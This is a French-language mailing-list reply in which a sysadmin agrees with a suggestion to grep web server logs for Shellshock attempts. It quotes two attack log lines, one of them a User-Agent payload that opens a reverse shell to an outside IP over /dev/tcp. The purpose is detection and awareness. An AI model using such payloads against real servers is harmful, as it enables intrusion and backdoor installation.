Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a écrit : > Ah ? Si tu gères des serveurs web je te propose de faire un simple cat > <fichier log serveur web>|grep "() {" et de compter le nombre de > tentatives d'accès comme par exemple > > 89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET > /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping > -c 1 198.101.206.138" > > ou encore > > 202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET / > HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& > /dev/tcp/195.225.34.101/3333 0>&1'" D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le second exemple de logs sur un de mes serveurs, ce qui correspond à une tentative d'implantation de porte dérobée — https://securelist.com/blog/research/66719/shellshock-and-its-early-adopters/ Cordialement. -- David Guyot Administrateur système, réseau et télécom / Sysadmin Europe Camions Interactive / Stockway Moulin Collot F-88500 Ambacourt 03 29 30 47 85
Attachment:
signature.asc
Description: This is a digitally signed message part